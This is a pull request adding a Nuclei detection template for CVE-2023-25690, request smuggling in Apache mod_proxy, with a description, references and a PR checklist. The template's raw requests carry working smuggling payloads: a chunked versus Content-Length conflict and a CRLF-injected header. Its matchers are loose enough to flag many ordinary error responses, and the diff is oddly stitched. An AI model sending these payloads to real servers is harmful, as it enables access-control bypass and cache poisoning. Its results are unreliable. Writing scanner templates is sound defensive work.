### PR TITLE
Add CVE-2023-25690 - Apache HTTP Server - HTTP Request Smuggling

### DIFF
--- a/http/cves/2023/CVE-2023-25690.yaml
+++ b/http/cves/2023/CVE-2023-25690.yaml
@@ -1,7 +1,7 @@
 id: CVE-2023-25690
 
 info:
-  name: Apache HTTP Server - HTTP Request Smuggling (CVE-2023-25690)
+  name: Apache HTTP Server - HTTP Request Smuggling
   author: melmathari
   severity: critical
   description: |

--- a/http/cves/2023/CVE-2023-25690.yaml
+++ b/http/cves/2023/CVE-2023-25690.yaml
@@ -1,0 +1,75 @@
+id: CVE-2023-25690
+
+info:
+  name: Apache HTTP Server - HTTP Request Smuggling (CVE-2023-25690)
+  author: melmathari
+  severity: critical
+  description: |
+    Some mod_proxy configurations on Apache HTTP Server versions 2.4.0 through 2.4.55 allow a HTTP Request Smuggling attack. Configurations are affected when mod_proxy is enabled along with some form of RewriteRule or ProxyPassMatch in which a non-specific pattern matches some portion of the user-supplied request-target (URL) data and is then re-inserted into the proxied request-target using variable substitution.
+  impact: |
+    Request splitting/smuggling could result in bypass of access controls in the proxy server, proxying unintended URLs to existing origin servers, and cache poisoning.
+  remediation: |
+    Users are recommended to update to at least version 2.4.56 of Apache HTTP Server.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-25690
+    - https://httpd.apache.org/security/vulnerabilities_24.html
+    - http://packetstormsecurity.com/files/176334/Apache-2.4.55-mod_proxy-HTTP-Request-Smuggling.html
+    - https://lists.debian.org/debian-lts-announce/2023/04/msg00028.html
+    - https://security.gentoo.org/glsa/202309-01
+    - https://github.com/dhmosfunk/CVE-2023-25690-POC
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-25690
+    cwe-id: CWE-444
+    cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: apache
+    product: http_server
+    shodan-query: apache
+  tags: cve,cve2023,apache,smuggling,http,mod-proxy,intrusive
+
+requests:
+  - raw:
+      - |
+        POST /proxy/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Length: 6
+        Transfer-Encoding: chunked
+        Connection: keep-alive
+
+        0
+
+        GET /smuggled HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /proxy/ HTTP/1.1
+        Host: {{Hostname}}
+        X-Test: test%0d%0aGET /smuggled HTTP/1.1
+        Connection: close
+
+    unsafe: true
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "POST /"
+          - "GET /smuggled"
+
+      - type: regex
+        part: body
+        regex:
+          - "(Invalid URI|Bad Request|Proxy Error|Request Timeout)"
+
+      - type: status
+        status:
+          - 200
+          - 400
+          - 408
+          - 502
+          - 503


### PR DESCRIPTION
/claim #12455 

### Template / PR Information

This PR adds a template for **CVE-2023-25690**, a critical HTTP Request Smuggling vulnerability in Apache HTTP Server versions **2.4.0 through 2.4.55** when `mod_proxy` is misconfigured with `RewriteRule` or `ProxyPassMatch` using variable substitution.


### Validation
- Tested in a lab environment with Apache 2.4.55 and `mod_proxy`.
- Verified via smuggled request evidence (`POST /`, `GET /smuggled`) and Apache desync error responses (`400`, `408`, `502`, `503`).

### References
- [NVD - CVE-2023-25690](https://nvd.nist.gov/vuln/detail/CVE-2023-25690)  
- [Public PoC](https://github.com/dhmosfunk/CVE-2023-25690-POC)  


### Template Validation

I've validated this template locally?
- [ x ] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)